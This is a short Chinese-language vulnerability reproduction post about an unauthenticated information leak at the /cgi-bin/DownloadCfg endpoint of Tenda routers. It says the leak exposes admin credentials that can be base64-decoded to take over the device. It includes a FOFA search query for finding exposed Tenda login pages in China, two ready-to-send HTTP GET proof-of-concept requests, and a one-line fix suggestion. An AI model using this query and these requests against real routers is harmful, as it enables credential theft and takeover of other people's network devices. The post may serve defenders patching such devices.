0x01 产品描述：

‌        Tenda路由器‌是由深圳市吉祥腾达科技有限公司（Tenda）生产的一系列网络通信产品。Tenda路由器以其高性能、高性价比和广泛的应用场景而闻名，适合家庭、办公室和各种网络环境。
0x02 漏洞描述：

        Tenda路由器 /cgi-bin/DownloadCfg接口处存在信息泄露漏洞，攻击者可通过此漏洞获取路由器后台账号密码。经过base64解码后可登录目标系统从而实现接管。
0x03 搜索语句：

Fofa：title="Tenda | LOGIN" && country="CN"

0x04 漏洞复现：

问题接口：

/cgi-bin/DownloadCfg/RouterCfm.jpg
/cgi-bin/DownloadCfg.jpg

poc1：

GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

 

poc2： 

GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Content-Type: application/json
Host: your-ip

0x05 修复建议：

接口加上权限，且如非必要系统请勿暴露在互联网端。